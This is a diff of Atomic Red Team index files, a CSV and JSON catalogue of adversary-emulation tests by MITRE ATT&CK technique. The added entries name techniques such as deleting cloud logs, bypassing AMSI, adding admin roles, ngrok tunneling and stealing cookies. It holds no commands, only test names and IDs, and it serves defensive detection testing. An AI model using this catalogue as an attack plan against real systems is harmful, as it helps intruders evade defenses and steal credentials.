Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
@@ -5,6 +5,7 @@ credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all
 credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
 defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
+persistence,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
 persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
@@ -1,12 +1,20 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,45,AWS - GuardDuty Suspension or Deletion,11e65d8d-e7e4-470e-a3ff-82bc56ad938e,bash
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,1,AWS - CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
+defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,4,AWS - Disable CloudTrail Logging Through Event Selectors using Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
+defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,6,AWS - Remove VPC Flow Logs using Stratus,93c150f5-ad7b-4ee3-8992-df06dec2ac79,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
+defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Activity Event Log,d56152ec-01d9-42a2-877c-aac1f6ebe8e6,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
+defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
+credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
 credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
+impact,T1485,Data Destruction,4,GCP - Delete Bucket,4ac71389-40f4-448a-b73f-754346b3f928,sh
+discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
 discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
 discovery,T1201,Password Policy Discovery,11,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
 discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
@@ -15,12 +23,16 @@ persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM use
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
 persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
 persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
+persistence,T1098,Account Manipulation,17,GCP - Delete Service Account Key,7ece1dea-49f1-4d62-bdcc-5801e3292510,sh
 persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
+persistence,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
 collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
 collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
+initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
+privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
@@ -65,7 +65,9 @@ defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8
 defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
 defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
+defense-evasion,T1564,Hide Artifacts,5,Command Execution with NirCmd,2748ab4a-1e0b-4cf2-a2b0-8ef765bec7be,powershell
 defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
+defense-evasion,T1562.009,Impair Defenses: Safe Boot Mode,1,Safe Mode Boot,2a78362e-b79a-4482-8e24-be397bce4d85,command_prompt
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
@@ -162,6 +164,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wua
 defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,13,LOLBAS CustomShellHost to Spawn Process,b1eeb683-90bb-4365-bbc2-2689015782fe,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
@@ -259,6 +262,7 @@ defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify be
 defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
 defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
 defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
+defense-evasion,T1112,Modify Registry,57,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
@@ -389,6 +393,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Reboot Lin
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,AMSI Bypass - Override AMSI via COM,17538258-5699-4ff1-92d1-5ac9b0dc21f5,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,45,AWS - GuardDuty Suspension or Deletion,11e65d8d-e7e4-470e-a3ff-82bc56ad938e,bash
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
@@ -448,6 +454,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,6,AWS - Remove VPC
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
+defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Activity Event Log,d56152ec-01d9-42a2-877c-aac1f6ebe8e6,sh
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
@@ -486,6 +493,7 @@ defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show al
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
+defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
@@ -562,6 +570,7 @@ privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
+privilege-escalation,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
 privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
@@ -576,7 +585,8 @@ privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter conta
 privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
-privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
 privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
 privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
@@ -691,6 +701,7 @@ privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Scrip
 privilege-escalation,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
+privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -853,6 +864,8 @@ persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with ref
 persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
+persistence,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
+persistence,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
 persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1137.006,Office Application Startup: Add-ins,2,Persistent Code Execution Via Excel Add-in File (XLL),9c307886-9fef-41d5-b344-073a0f5b2f5f,powershell
@@ -874,7 +887,8 @@ persistence,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Por
 persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
 persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
-persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
 persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
 persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
@@ -909,6 +923,8 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
+persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh
+persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh
 persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
 persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
@@ -956,6 +972,7 @@ persistence,T1098,Account Manipulation,13,Domain Password Policy Check: No Upper
 persistence,T1098,Account Manipulation,14,Domain Password Policy Check: No Lowercase Character in Password,945da11e-977e-4dab-85d2-f394d03c5887,powershell
 persistence,T1098,Account Manipulation,15,Domain Password Policy Check: Only Two Character Classes,784d1349-5a26-4d20-af5e-d6af53bae460,powershell
 persistence,T1098,Account Manipulation,16,Domain Password Policy Check: Common Password Use,81959d03-c51f-49a1-bb24-23f1ec885578,powershell
+persistence,T1098,Account Manipulation,17,GCP - Delete Service Account Key,7ece1dea-49f1-4d62-bdcc-5801e3292510,sh
 persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
 persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
@@ -1001,11 +1018,13 @@ persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,
 persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
 persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
+persistence,T1098.002,Account Manipulation: Additional Email Delegate Permissions,1,EXO - Full access mailbox permission granted to a user,17d046be-fdd0-4cbb-b5c7-55c85d9d0714,powershell
 persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
 persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
 persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
+persistence,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
@@ -1042,6 +1061,7 @@ command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
+command-and-control,T1572,Protocol Tunneling,4,run ngrok,4cdc9fc7-53fb-4894-9f0c-64836943ea60,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
@@ -1154,6 +1174,8 @@ lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticke
 lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
 lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 lateral-movement,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
+lateral-movement,T1570,Lateral Tool Transfer,1,Exfiltration Over SMB over QUIC (New-SmbMapping),d8d13303-159e-4f33-89f4-9f07812d016f,powershell
+lateral-movement,T1570,Lateral Tool Transfer,2,Exfiltration Over SMB over QUIC (NET USE),183235ca-8e6c-422c-88c2-3aa28c4825d9,powershell
 lateral-movement,T1563.002,Remote Service Session Hijacking: RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
 lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
@@ -1184,6 +1206,7 @@ credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service A
 credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using keymgr.dll and rundll32.exe,84113186-ed3c-4d0d-8a3c-8980c86c1f4a,powershell
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
